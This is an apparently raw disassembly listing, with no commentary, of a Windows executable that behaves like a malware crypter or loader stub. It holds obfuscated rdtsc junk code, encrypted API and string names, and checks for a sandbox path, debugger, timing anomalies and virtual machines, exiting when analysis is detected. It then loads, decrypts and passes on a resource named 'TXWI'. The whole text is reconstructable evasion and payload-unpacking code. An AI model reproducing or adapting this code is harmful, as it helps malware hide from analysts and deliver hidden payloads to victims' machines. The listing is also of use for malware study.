dd 65726574h, 0F9410064h, 20820Fh, 0B5000000h, 0CF539483h
dd 310F5250h, 335AC833h, 1EB58C8h, 820FF96Eh, 34h, 4B90F000h
dd 310FE45Bh, 310FC88Bh, 0D1F7C82Bh, 5000F981h, 57C0000h
dd 0C47C6BE9h, 0F525048h, 5AC83331h, 0F858C833h, 0FF06830Fh
dd 8F00FFFFh, 51553499h, 0F1E01EBh, 0FFFF7180h, 6B810FFFh
dd 49FFFFFFh, 102E9h, 10424100h, 0F8A8173Dh, 8B310F44h
dd 2B310FC8h, 81D1F7C8h, 5000F9h, 0E9057C00h, 6C6CCC8Fh
dd 0C88B310Fh, 0C82B310Fh, 0F981D1F7h, 5000h, 46E8FE7Fh
dd 0C7000000h, 0A13D1091h, 6A350886h, 6A5800h, 83595158h
dd 880F04C4h, 0FFFFFFB9h, 0FFB3890Fh, 0F52FFFFh, 0FC88B31h
dd 0F7C82B31h, 0F981D1h, 7C000050h, 0CC0FE905h, 0C80FC0A8h
dd 154E8h, 10681500h, 0AB53233Dh, 1E889h, 0E8A60000h, 1
dd 24448338h, 4831204h, 18C30A24h, 0C88B310Fh, 0C82B310Fh
dd 0F981D1F7h, 5000h, 8365FE7Fh, 0FF904C4h, 16A82h, 0CD7B0000h
dd 0F3DB712h, 50CF0FCFh, 704EB58h, 0FF8AC2Ch, 0FF8C0AFh
dd 0D883h, 40C00000h, 0E85B8A35h, 0Bh, 69676572h, 72657473h
dd 58006465h, 0BE8h, 67657200h, 65747369h, 646572h, 44E83658h
dd 0BFFFFFFh, 0BD3D108Eh, 0E8EC44D1h, 0Bh, 69676572h, 72657473h
dd 58006465h, 4F504EBh, 310F607Ch, 310FC88Bh, 0D1F7C82Bh
dd 5000F981h, 57C0000h, 0DC9CD3E9h, 0C0C10F04h, 44830FF8h
dd 1, 0E2853A56h, 770DEB82h, 676E6F72h, 72657320h, 6C6169h
dd 0C08BC80Fh, 0A78C0Fh, 8D0F0000h, 0A1h, 0BE8B1h, 65720000h
dd 74736967h, 64657265h, 0BE85800h, 72000000h, 73696765h
dd 65726574h, 8A580064h, 41C8B0C0h, 0B2820FF9h, 0FFFFFFh
dd 89CE0B6Dh, 4C4833Ah, 0FEB9800Fh, 810FFFFFh, 0FFFFFEB3h
dd 8B310F23h, 2B310FC8h, 81D1F7C8h, 5000F9h, 0EBFE7F00h
dd 5A525001h, 0FF118C0Fh, 8D0FFFFFh, 0FFFFFF0Bh, 8B310F67h
dd 2B310FC8h, 81D1F7C8h, 5000F9h, 0FFE7F00h, 0FC88B31h
dd 0F7C82B31h, 0F981D1h, 7F000050h, 4801EBFEh, 4C48365h
dd 0FFFF68E9h, 106F55FFh, 0F2C9E33Dh, 720BEBE9h, 73696765h
dd 65726574h, 0A4E90064h, 3FFFFFFEh, 693D1081h, 0FAB27C8h
dd 0FC88B31h, 0F7C82B31h, 0F981D1h, 7F000050h, 0CDF68FEh
dd 0C4830000h, 800F4104h, 61h, 5B810Fh, 0EB650000h, 6765720Bh
dd 65747369h, 646572h, 310F5250h, 335AC833h, 1E858C8h
dd 7E000000h, 1E8h, 44831800h, 83120424h, 0C30A2404h, 1EE841B8h
dd 56FFFFFFh, 3A3D105Eh, 0E8F76A27h, 0Bh, 69676572h, 72657473h
dd 58006465h, 0FFFFAEE9h, 1056FAFFh, 82B6F63Dh, 0FF45C67Eh
dd 0FF458A01h, 90C35D59h
; ---------------------------------------------------------------------------
loc_403630: ; CODE XREF: start+2C�p
; sub_403EB5:loc_403F08�p ...
push ebp
mov ebp, esp
push ecx
jz short loc_40363F
jnz short near ptr loc_403638+2
loc_403638: ; CODE XREF: CODE:00403636�j
call far ptr 0E801h:750374E8h
loc_40363F: ; CODE XREF: CODE:00403634�j
nop
nop
nop
nop
mov byte ptr [ebp-1], 1
mov al, [ebp-1]
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403650 proc near ; CODE XREF: sub_4036BC+45�p
var_114 = byte ptr -114h
var_14 = byte ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFEECh
mov [ebp+var_8], edx
mov [ebp+var_4], eax
lea edx, [ebp+var_114]
mov eax, [ebp+var_4]
call sub_40145C
lea edx, [ebp+var_114]
lea eax, [ebp+var_14]
mov cl, 0Bh
call sub_4013C0
mov eax, [ebp+var_8]
lea edx, [ebp+var_14]
call sub_4017E4
mov esp, ebp
pop ebp
retn
sub_403650 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40368C proc near ; CODE XREF: sub_403EB5+65�p
; sub_403EB5+72�p ...
var_18 = dword ptr -18h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFE8h
xor ecx, ecx
mov [ebp+var_18], ecx
mov [ebp+var_8], edx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_40197C
xor eax, eax
push ebp
push offset loc_40373C
push dword ptr fs:[eax]
mov fs:[eax], esp
pushfw
loc_4036B5: ; CODE XREF: sub_40368C+2E�j
call sub_4036BC
jb short loc_4036B5
sub_40368C endp
; =============== S U B R O U T I N E =======================================
sub_4036BC proc near ; CODE XREF: sub_40368C:loc_4036B5�p
add esp, 4
popfw
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
mov eax, [ebp-4]
call sub_401808
test eax, eax
jle short loc_40371E
mov [ebp-14h], eax
mov dword ptr [ebp-0Ch], 1
loc_4036E1: ; CODE XREF: sub_4036BC+60�j
mov byte ptr [ebp-0Dh], 1
mov al, [ebp-0Dh]
inc eax
add al, [ebp-0Ch]
mov [ebp-0Dh], al
mov eax, [ebp-8]
push dword ptr [eax]
push offset aSskksks ; "sskksks"
lea edx, [ebp-18h]
xor eax, eax
mov al, [ebp-0Dh]
call sub_403650
push dword ptr [ebp-18h]
mov eax, [ebp-8]
mov edx, 3
call sub_401854
inc dword ptr [ebp-0Ch]
dec dword ptr [ebp-14h]
jnz short loc_4036E1
loc_40371E: ; CODE XREF: sub_4036BC+19�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403743
loc_40372B: ; CODE XREF: sub_4036BC+85�j
lea eax, [ebp-18h]
call sub_4016E0
lea eax, [ebp-4]
call sub_4016E0
retn
; ---------------------------------------------------------------------------
loc_40373C: ; DATA XREF: sub_40368C+1C�o
jmp loc_4014B0
; ---------------------------------------------------------------------------
jmp short loc_40372B
; ---------------------------------------------------------------------------
loc_403743: ; CODE XREF: sub_4036BC+7F�j
; DATA XREF: sub_4036BC+6A�o
mov esp, ebp
pop ebp
retn
sub_4036BC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 7
aSskksks db 'sskksks',0 ; DATA XREF: sub_4036BC+38�o
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403758 proc near ; CODE XREF: sub_403818+2A�p
; sub_403818+4A�p ...
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFE8h
xor ecx, ecx
mov [ebp+var_18], ecx
mov [ebp+var_8], edx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_40197C
xor eax, eax
push ebp
push offset loc_4037E4
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+var_4]
call sub_401808
test eax, eax
jle short loc_4037C6
mov [ebp+var_14], eax
mov [ebp+var_C], 1
loc_403795: ; CODE XREF: sub_403758+6C�j
mov eax, [ebp+var_4]
mov edx, [ebp+var_C]
mov al, [eax+edx-1]
mov [ebp+var_D], al
lea eax, [ebp+var_18]
mov dl, [ebp+var_D]
sub dl, 3Bh
call sub_4017D4
mov edx, [ebp+var_18]
mov eax, [ebp+var_8]
call sub_401810
mov eax, [ebp+var_8]
inc [ebp+var_C]
dec [ebp+var_14]
jnz short loc_403795
loc_4037C6: ; CODE XREF: sub_403758+31�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4037EB
loc_4037D3: ; CODE XREF: sub_403758+91�j
lea eax, [ebp+var_18]
call sub_4016E0
lea eax, [ebp+var_4]
call sub_4016E0
retn
; ---------------------------------------------------------------------------
loc_4037E4: ; DATA XREF: sub_403758+1C�o
jmp loc_4014B0
; ---------------------------------------------------------------------------
jmp short loc_4037D3
; ---------------------------------------------------------------------------
loc_4037EB: ; CODE XREF: sub_403758+8B�j
; DATA XREF: sub_403758+76�o
mov esp, ebp
pop ebp
retn
sub_403758 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4037F0 proc near ; CODE XREF: sub_403EB5:loc_403EF8�p
var_7 = byte ptr -7
var_6 = byte ptr -6
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
sidt fword ptr [ebp+var_6]
mov al, [ebp+var_6+5]
sub al, 0E8h
jz short loc_403805
sub al, 17h
jnz short loc_40380B
loc_403805: ; CODE XREF: sub_4037F0+F�j
mov [ebp+var_7], 1
jmp short loc_40380F
; ---------------------------------------------------------------------------
loc_40380B: ; CODE XREF: sub_4037F0+13�j
mov [ebp+var_7], 0
loc_40380F: ; CODE XREF: sub_4037F0+19�j
mov al, [ebp+var_7]
pop ecx
pop ecx
pop ebp
retn
sub_4037F0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403818 proc near ; CODE XREF: sub_403EB5:loc_403ED8�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
push ebp
mov ebp, esp
add esp, 0FFFFFFD8h
xor eax, eax
mov [ebp+var_28], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_1C], eax
xor eax, eax
push ebp
push offset loc_403927
push dword ptr fs:[eax]
mov fs:[eax], esp
lea edx, [ebp+var_1C]
mov eax, offset dword_403940
call sub_403758
mov eax, [ebp+var_1C]
call sub_40198C
push eax ; lpLibFileName
call LoadLibraryA
mov ds:hModule, eax
lea edx, [ebp+var_20]
mov eax, offset dword_403958
call sub_403758
mov eax, [ebp+var_20]
call sub_40198C
push eax ; lpProcName
mov eax, ds:hModule
push eax ; hModule
call GetProcAddress
mov ds:dword_406134, eax
lea edx, [ebp+var_24]
mov eax, offset dword_403970
call sub_403758
mov eax, [ebp+var_24]
call sub_40198C
push eax
mov eax, ds:hModule
push eax
call ds:dword_406134
mov [ebp+var_14], eax
lea edx, [ebp+var_28]
mov eax, offset dword_403988
call sub_403758
mov eax, [ebp+var_28]
call sub_40198C
push eax
mov eax, ds:hModule
push eax
call ds:dword_406134
mov [ebp+var_18], eax
mov [ebp+var_1], 0
call [ebp+var_14]
mov [ebp+var_8], eax
push 96h
call [ebp+var_18]
call [ebp+var_14]
mov [ebp+var_C], eax
push 96h
call [ebp+var_18]
call [ebp+var_14]
mov [ebp+var_10], eax
mov eax, [ebp+var_C]
sub eax, [ebp+var_8]
cmp eax, 64h
jge short loc_40390C
mov eax, [ebp+var_10]
sub eax, [ebp+var_8]
cmp eax, 0FAh
jge short loc_40390C
mov [ebp+var_1], 1
loc_40390C: ; CODE XREF: sub_403818+E1�j
; sub_403818+EE�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40392E
loc_403919: ; CODE XREF: sub_403818+114�j
lea eax, [ebp+var_28]
mov edx, 4
call sub_401704
retn
; ---------------------------------------------------------------------------
loc_403927: ; DATA XREF: sub_403818+17�o
jmp loc_4014B0
; ---------------------------------------------------------------------------
jmp short loc_403919
; ---------------------------------------------------------------------------
loc_40392E: ; CODE XREF: sub_403818+10E�j
; DATA XREF: sub_403818+FC�o
mov al, [ebp+var_1]
mov esp, ebp
pop ebp
retn
sub_403818 endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 0Ch
dword_403940 dd 0A9ADA0A6h, 6D6EA7A0h, 0A7A79F69h, 0 ; DATA XREF: sub_403818+25�o
dd 0FFFFFFFFh, 0Eh
dword_403958 dd 8BAFA082h, 7C9EAAADh, 0A0AD9F9Fh, 0AEAEh, 0FFFFFFFFh
; DATA XREF: sub_403818+45�o
dd 0Ch
dword_403970 dd 8FAFA082h, 7EA69EA4h, 0AFA9B0AAh, 0 ; DATA XREF: sub_403818+6B�o
dd 0FFFFFFFFh, 5
dword_403988 dd 0A0A0A78Eh, 0ABh ; DATA XREF: sub_403818+90�o
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403990 proc near ; CODE XREF: sub_403EB5+13�p
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
Filename = byte ptr -106h
var_1 = byte ptr -1
push ebp
mov ebp, esp
add esp, 0FFFFFEE8h
xor eax, eax
mov [ebp+var_114], eax
mov [ebp+var_118], eax
mov [ebp+var_10C], eax
mov [ebp+var_110], eax
xor eax, eax
push ebp
push offset loc_403A83
push dword ptr fs:[eax]
mov fs:[eax], esp
mov [ebp+var_1], 0
push 104h ; nSize
lea eax, [ebp+Filename]
push eax ; lpFilename
push 0 ; lpModuleName
call GetModuleHandleA_0
push eax ; hModule
call GetModuleFileNameA_0
lea eax, [ebp+var_10C]
push eax
lea eax, [ebp+var_110]
lea edx, [ebp+Filename]
mov ecx, 105h
call sub_4017F0
mov eax, [ebp+var_110]
mov ecx, 0Ch
mov edx, 1
call sub_4019E0
mov eax, [ebp+var_10C]
mov edx, offset dword_403A9C
call sub_4018D8
jnz short loc_403A26
mov [ebp+var_1], 1
loc_403A26: ; CODE XREF: sub_403990+90�j
lea eax, [ebp+var_114]
push eax
lea edx, [ebp+var_118]
xor eax, eax
call sub_401360
mov eax, [ebp+var_118]
mov ecx, 0Ch
mov edx, 1
call sub_4019E0
mov eax, [ebp+var_114]
mov edx, offset dword_403A9C
call sub_4018D8
jnz short loc_403A65
mov [ebp+var_1], 1
loc_403A65: ; CODE XREF: sub_403990+CF�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403A8A
loc_403A72: ; CODE XREF: sub_403990+F8�j
lea eax, [ebp+var_118]
mov edx, 4
call sub_401704
retn
; ---------------------------------------------------------------------------
loc_403A83: ; DATA XREF: sub_403990+26�o
jmp loc_4014B0
; ---------------------------------------------------------------------------
jmp short loc_403A72
; ---------------------------------------------------------------------------
loc_403A8A: ; CODE XREF: sub_403990+F2�j
; DATA XREF: sub_403990+DD�o
mov al, [ebp+var_1]
mov esp, ebp
pop ebp
retn
sub_403990 endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 0Ch
dword_403A9C dd 495C3A43h, 6469736Eh, 5C6D5465h, 0 ; DATA XREF: sub_403990+86�o
; sub_403990+C5�o
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403AAC proc near ; CODE XREF: sub_403EB5:loc_403EE8�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
push ebp
mov ebp, esp
add esp, 0FFFFFFE8h
xor eax, eax
mov [ebp+var_18], eax
mov [ebp+var_14], eax
mov [ebp+var_10], eax
xor eax, eax
push ebp
push offset loc_403B72
push dword ptr fs:[eax]
mov fs:[eax], esp
lea edx, [ebp+var_10]
mov eax, offset dword_403B88
call sub_403758
mov eax, [ebp+var_10]
call sub_40198C
push eax ; lpLibFileName
call LoadLibraryA
mov ds:hModule, eax
lea edx, [ebp+var_14]
mov eax, offset dword_403BA0
call sub_403758
mov eax, [ebp+var_14]
call sub_40198C
push eax ; lpProcName
mov eax, ds:hModule
push eax ; hModule
call GetProcAddress
mov ds:dword_406134, eax
mov [ebp+var_1], 0
lea edx, [ebp+var_18]
mov eax, offset dword_403B88
call sub_403758
mov eax, [ebp+var_18]
call sub_40198C
push eax ; lpLibFileName
call LoadLibraryA
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_403B57
push offset aIsdebuggerpres ; "IsDebuggerPresent"
mov eax, [ebp+var_C]
push eax
call ds:dword_406134
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_403B57
call [ebp+var_8]
mov [ebp+var_1], al
loc_403B57: ; CODE XREF: sub_403AAC+8B�j
; sub_403AAC+A3�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403B79
loc_403B64: ; CODE XREF: sub_403AAC+CB�j
lea eax, [ebp+var_18]
mov edx, 3
call sub_401704
retn
; ---------------------------------------------------------------------------
loc_403B72: ; DATA XREF: sub_403AAC+14�o
jmp loc_4014B0
; ---------------------------------------------------------------------------
jmp short loc_403B64
; ---------------------------------------------------------------------------
loc_403B79: ; CODE XREF: sub_403AAC+C5�j
; DATA XREF: sub_403AAC+B3�o
mov al, [ebp+var_1]
mov esp, ebp
pop ebp
retn
sub_403AAC endp
; ---------------------------------------------------------------------------
dd 0FFFFFFFFh, 0Ch
dword_403B88 dd 0A9ADA0A6h, 6D6EA7A0h, 0A7A79F69h, 0 ; DATA XREF: sub_403AAC+22�o
; sub_403AAC+6C�o
dd 0FFFFFFFFh, 0Eh
dword_403BA0 dd 8BAFA082h, 7C9EAAADh, 0A0AD9F9Fh, 0AEAEh ; DATA XREF: sub_403AAC+42�o
aIsdebuggerpres db 'IsDebuggerPresent',0 ; DATA XREF: sub_403AAC+8D�o
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403BC4 proc near ; CODE XREF: sub_403EB5+110�p
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFBCh
xor ecx, ecx
mov [ebp+var_44], ecx
mov [ebp+var_40], ecx
mov [ebp+var_3C], ecx
mov [ebp+var_38], ecx
mov [ebp+var_34], ecx
mov [ebp+var_30], ecx
mov [ebp+var_2C], ecx
mov [ebp+var_8], edx
mov [ebp+var_4], eax
xor eax, eax
push ebp
push offset loc_403D5A
push dword ptr fs:[eax]
mov fs:[eax], esp
lea edx, [ebp+var_2C]
mov eax, offset dword_403D70
call sub_403758
mov eax, [ebp+var_2C]
call sub_40198C
push eax ; lpLibFileName
call LoadLibraryA
mov ds:hModule, eax
lea edx, [ebp+var_30]
mov eax, offset dword_403D88
call sub_403758
mov eax, [ebp+var_30]
call sub_40198C
push eax ; lpProcName
mov eax, ds:hModule
push eax ; hModule
call GetProcAddress
mov ds:dword_406134, eax
lea edx, [ebp+var_34]
mov eax, offset dword_403DA0
call sub_403758
mov eax, [ebp+var_34]
call sub_40198C
push eax
mov eax, ds:hModule
push eax
call ds:dword_406134
mov [ebp+var_18], eax
lea edx, [ebp+var_38]
mov eax, offset dword_403DB8
call sub_403758
mov eax, [ebp+var_38]
call sub_40198C
push eax
mov eax, ds:hModule
push eax
call ds:dword_406134
mov [ebp+var_1C], eax
lea edx, [ebp+var_3C]
mov eax, offset dword_403DD0
call sub_403758
mov eax, [ebp+var_3C]
call sub_40198C
push eax
mov eax, ds:hModule
push eax
call ds:dword_406134
mov [ebp+var_20], eax
lea edx, [ebp+var_40]
mov eax, offset dword_403DE8
call sub_403758
mov eax, [ebp+var_40]
call sub_40198C
push eax
mov eax, ds:hModule
push eax
call ds:dword_406134
mov [ebp+var_24], eax
lea edx, [ebp+var_44]
mov eax, offset loc_403E00
call sub_403758
mov eax, [ebp+var_44]
call sub_40198C
push eax
mov eax, ds:hModule
push eax
call ds:dword_406134
mov [ebp+var_28], eax
push 0Ah
mov eax, [ebp+var_8]
push eax
mov eax, ds:dword_406114
push eax
call [ebp+var_18]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
push eax
mov eax, ds:dword_406114
push eax
call [ebp+var_1C]
mov edx, [ebp+var_4]
mov [edx], eax
mov eax, [ebp+var_10]
push eax
mov eax, ds:dword_406114
push eax
call [ebp+var_20]
mov [ebp+var_14], eax
mov eax, [ebp+var_14]
push eax
call [ebp+var_24]
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_403D3F
mov eax, [ebp+var_14]
push eax
call [ebp+var_28]
loc_403D3F: ; CODE XREF: sub_403BC4+172�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403D61
loc_403D4C: ; CODE XREF: sub_403BC4+19B�j
lea eax, [ebp+var_44]
mov edx, 7
call sub_401704
retn
; ---------------------------------------------------------------------------
loc_403D5A: ; DATA XREF: sub_403BC4+26�o
jmp loc_4014B0
; ---------------------------------------------------------------------------
jmp short loc_403D4C
; ---------------------------------------------------------------------------
loc_403D61: ; CODE XREF: sub_403BC4+195�j
; DATA XREF: sub_403BC4+183�o
mov eax, [ebp+var_C]
mov esp, ebp
pop ebp
retn
sub_403BC4 endp
; ---------------------------------------------------------------------------
dd 0FFFFFFFFh, 0Ch
dword_403D70 dd 0A9ADA0A6h, 6D6EA7A0h, 0A7A79F69h, 0 ; DATA XREF: sub_403BC4+34�o
dd 0FFFFFFFFh, 0Eh
dword_403D88 dd 8BAFA082h, 7C9EAAADh, 0A0AD9F9Fh, 0AEAEh, 0FFFFFFFFh
; DATA XREF: sub_403BC4+54�o
dd 0Dh
dword_403DA0 dd 9FA9A481h, 0AAAEA08Dh, 0A09EADB0h, 7Ch, 0FFFFFFFFh
; DATA XREF: sub_403BC4+7A�o
dd 0Eh
dword_403DB8 dd 0A0B5A48Eh, 0A08DA1AAh, 0ADB0AAAEh, 0A09Eh, 0FFFFFFFFh
; DATA XREF: sub_403BC4+9F�o
dd 0Ch
dword_403DD0 dd 9F9CAA87h, 0AAAEA08Dh, 0A09EADB0h, 0 ; DATA XREF: sub_403BC4+C4�o
dd 0FFFFFFFFh, 0Ch
dword_403DE8 dd 0A69EAA87h, 0AAAEA08Dh, 0A09EADB0h, 0 ; DATA XREF: sub_403BC4+E9�o
dd 0FFFFFFFFh, 0Ch
; ---------------------------------------------------------------------------
loc_403E00: ; DATA XREF: sub_403BC4+10E�o
sub dword ptr [ebp-5F725F60h], 0ADB0AAAEh
sahf
mov al, large ds:0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403E10 proc near ; DATA XREF: CODE:00403E74�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_403E2F
push dword ptr fs:[eax]
mov fs:[eax], esp
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403E36
loc_403E2E: ; CODE XREF: sub_403E10+24�j
retn
; ---------------------------------------------------------------------------
loc_403E2F: ; DATA XREF: sub_403E10+6�o
jmp loc_4014B0
; ---------------------------------------------------------------------------
jmp short loc_403E2E
; ---------------------------------------------------------------------------
loc_403E36: ; CODE XREF: sub_403E10:loc_403E2E�j
; DATA XREF: sub_403E10+19�o
pop ebp
retn
sub_403E10 endp
; ---------------------------------------------------------------------------
dword_403E38 dd 7, 403E40h, 401C90h, 401C60h, 401B48h, 401B00h, 401CC8h
; DATA XREF: start+F�o
dd 401C98h, 401D30h, 401D00h, 401F10h, 401EE0h, 40263Ch
dd 40260Ch, 0
dd offset sub_403E10
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near
push ebp
mov ebp, esp
mov ecx, 7
loc_403E80: ; CODE XREF: start+D�j
push 0
push 0
dec ecx
jnz short loc_403E80
mov eax, offset dword_403E38
call sub_401C1C
xor eax, eax
push ebp
push offset loc_40408F
push dword ptr fs:[eax]
mov fs:[eax], esp
call sub_402644
call loc_403630
nop
pushfw
push 0Ah
loc_403EAE: ; CODE XREF: start+3B�j sub_403EB5+6�j
call sub_403EB5
jnb short loc_403EAE
start endp
; =============== S U B R O U T I N E =======================================
sub_403EB5 proc near ; CODE XREF: start:loc_403EAE�p
arg_0 = dword ptr 4
add esp, 4
dec [esp-4+arg_0]
jns short loc_403EAE
add esp, 4
popfw
nop
call sub_402644
call sub_403990
cmp al, 1
jnz short loc_403ED8
push 0 ; uExitCode
call ExitProcess_0
loc_403ED8: ; CODE XREF: sub_403EB5+1A�j
call sub_403818
cmp al, 1
jnz short loc_403EE8
push 0 ; uExitCode
call ExitProcess_0
loc_403EE8: ; CODE XREF: sub_403EB5+2A�j
call sub_403AAC
cmp al, 1
jnz short loc_403EF8
push 0 ; uExitCode
call ExitProcess_0
loc_403EF8: ; CODE XREF: sub_403EB5+3A�j
call sub_4037F0
cmp al, 1
jnz short loc_403F08
push 0 ; uExitCode
call ExitProcess_0
loc_403F08: ; CODE XREF: sub_403EB5+4A�j
call loc_403630
call sub_402644
lea edx, [ebp-18h]
mov eax, offset dword_4040A4
call sub_40368C
lea edx, [ebp-1Ch]
mov eax, offset aSdgdsgsd ; "sdgdsgsd"
call sub_40368C
lea edx, [ebp-20h]
mov eax, offset aSdgsd ; "sdgsd"
call sub_40368C
lea edx, [ebp-24h]
mov eax, offset aNsdgdsgsd ; "nsdgdsgsd"
call sub_40368C
call loc_403630
call loc_403630
call loc_403630
call sub_402644
call sub_401300
test eax, eax
jle short loc_403FA5
mov [ebp-14h], eax
mov ds:dword_406148, 1
loc_403F70: ; CODE XREF: sub_403EB5+EE�j
push ds:dword_40614C
push offset dword_4040E8
lea edx, [ebp-28h]
mov eax, ds:dword_406148
call sub_401360
push dword ptr [ebp-28h]
mov eax, offset dword_40614C
mov edx, 3
call sub_401854
inc ds:dword_406148
dec dword ptr [ebp-14h]
jnz short loc_403F70
loc_403FA5: ; CODE XREF: sub_403EB5+AC�j
mov eax, offset dword_406144
mov edx, offset aTxwi ; "TXWI"
call sub_401734
mov eax, ds:dword_406144
call sub_40198C
mov edx, eax
mov eax, offset dword_40613C
call sub_403BC4
mov ds:dword_406138, eax
cmp ds:dword_406138, 0
jz loc_404066
mov eax, offset dword_406140
mov edx, ds:dword_40613C
call sub_401A20
mov eax, offset dword_406140
call sub_4019D8
mov edx, eax
mov eax, ds:dword_406138
mov ecx, ds:dword_40613C
call sub_4011B4
lea edx, [ebp-34h]
mov eax, ds:dword_406140
call sub_403758
mov eax, [ebp-34h]
push eax
lea eax, [ebp-30h]
push eax
call sub_401D4C
mov eax, [ebp-30h]
push eax
lea eax, [ebp-2Ch]
push eax
call sub_401E0C
mov edx, [ebp-2Ch]
mov eax, offset dword_406140
call sub_401734
push 0
lea edx, [ebp-38h]
xor eax, eax
call sub_401360
mov eax, [ebp-38h]
push eax
mov eax, offset dword_406140
call sub_4019D8
mov ecx, ds:dword_40614C
pop edx
call sub_401FF4
test al, al
jmp short loc_40406D
; ---------------------------------------------------------------------------
loc_404066: ; CODE XREF: sub_403EB5+121�j
push 0 ; uExitCode
call ExitProcess_0
loc_40406D: ; CODE XREF: sub_403EB5+1AF�j
push 0 ; uExitCode
call ExitProcess_0
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_404096
loc_404081: ; CODE XREF: sub_403EB5+1DF�j
lea eax, [ebp-38h]
mov edx, 9
call sub_401704
retn
; ---------------------------------------------------------------------------
loc_40408F: ; DATA XREF: start+1C�o
jmp loc_4014B0
; ---------------------------------------------------------------------------
jmp short loc_404081
; ---------------------------------------------------------------------------
loc_404096: ; CODE XREF: sub_403EB5+1D9�j
; DATA XREF: sub_403EB5+1C7�o
call sub_4015F8
sub_403EB5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 2
dword_4040A4 dd 6473h, 0FFFFFFFFh, 8 ; DATA XREF: sub_403EB5+60�o
aSdgdsgsd db 'sdgdsgsd',0 ; DATA XREF: sub_403EB5+6D�o
align 4
dd 0FFFFFFFFh, 5
aSdgsd db 'sdgsd',0 ; DATA XREF: sub_403EB5+7A�o
align 4
dd 0FFFFFFFFh, 9
aNsdgdsgsd db 'nsdgdsgsd',0 ; DATA XREF: sub_403EB5+87�o
align 10h
dd 0FFFFFFFFh, 1
dword_4040E8 dd 20h, 0FFFFFFFFh, 4 ; DATA XREF: sub_403EB5+C1�o
aTxwi db 'TXWI',0 ; DATA XREF: sub_403EB5+F5�o
align 4
dd 41h dup(0)
dd 380h dup(?)
CODE ends
; Section 2. (virtual address 00005000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00003600
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
DATA segment para public 'DATA' use32
assume cs:DATA
;org 405000h
dword_405000 dd 0 ; DATA XREF: sub_4015C8+2�w
; sub_4015F8+9�o ...
dword_405004 dd 0 ; DATA XREF: sub_401150�w
; sub_4015F8:loc_401627�r ...
byte_405008 db 0 ; DATA XREF: sub_401488�r
db 8Dh, 40h, 0
dword_40500C dd 0 ; DATA XREF: sub_401AD0�r sub_401AD0+8�w
dword_405010 dd 0 ; DATA XREF: sub_401AE0+4�r
off_405014 dd offset sub_401AE0 ; DATA XREF: sub_4015F8+66�r
